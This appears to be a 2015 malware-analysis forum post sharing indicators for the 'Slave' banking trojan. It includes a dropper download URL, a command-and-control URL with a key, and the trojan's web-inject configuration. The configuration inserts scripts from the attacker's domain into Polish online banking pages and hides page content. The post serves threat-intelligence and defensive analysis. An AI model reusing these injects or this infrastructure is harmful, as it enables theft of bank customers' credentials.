A forum for reverse engineering, OS internals and malware analysis 

Slave

Forum for analysis and discussion about malware.

Re: Slave

 #26872  by sysopfb
 Fri Oct 02, 2015 6:43 pm
Sample from andromeda
https://www.virustotal.com/en/file/d627 ... /analysis/

Downloads (In attached)
https://www.virustotal.com/en/file/85cf ... /analysis/

From: jrp.wik.zdzieszowice.pl/modul/pessa.exe

Calls home:
Code: Select all
 www.mymotherhascome.com/info.php?key=DxoKI4EEMZwJGIw5SUxMCIHBQRKA4U
Config:
Code: Select all
[{"url":"online.mbank.pl\/pl*","stringbefore":"<body>","stringafter":"<div","injectionstring":"<script type=\"text\/javascript\" src=\"\/\/www.mymotherhascome.com\/js\/get.php?key=DxoKI4EEMZwJGIw5SUxMCIHBQRKA4U&id=1\"><\/script>"},{"url":"*.pekao24.pl*","stringbefore":"<\/title>","stringafter":"<","injectionstring":"<script type=\"text\/javascript\" src=\"\/\/www.mymotherhascome.com\/js\/get.php?key=DxoKI4EEMZwJGIw5SUxMCIHBQRKA4U&id=4\"><\/script>"},{"url":"*multibank.pl*","stringbefore":"<\/title>","stringafter":"<","injectionstring":"<script src=\"\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.11.3\/jquery.min.js\"><\/script><script type=\"text\/javascript\" src=\"\/\/www.mymotherhascome.com\/js\/get.php?key=DxoKI4EEMZwJGIw5SUxMCIHBQRKA4U&id=5\"><\/script>"},{"url":"online.ingbank.pl\/bskonl\/*","stringbefore":"<\/title>","stringafter":"<","injectionstring":"<script src=\"\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.11.3\/jquery.min.js\"><\/script><script type=\"text\/javascript\" src=\"\/\/www.mymotherhascome.com\/js\/get.php?key=DxoKI4EEMZwJGIw5SUxMCIHBQRKA4U&id=6\"><\/script>"},{"url":"online.ingbank.pl\/bskonl\/*","stringbefore":"<div id=\"main\"","stringafter":">","injectionstring":"style=\"opacity:0;\" "}]
Sample and injects are attached.
Attachments
pw:infected
(49.51 KiB) Downloaded 52 times
pw: infected
(288.08 KiB) Downloaded 50 times
 Return to “Malware”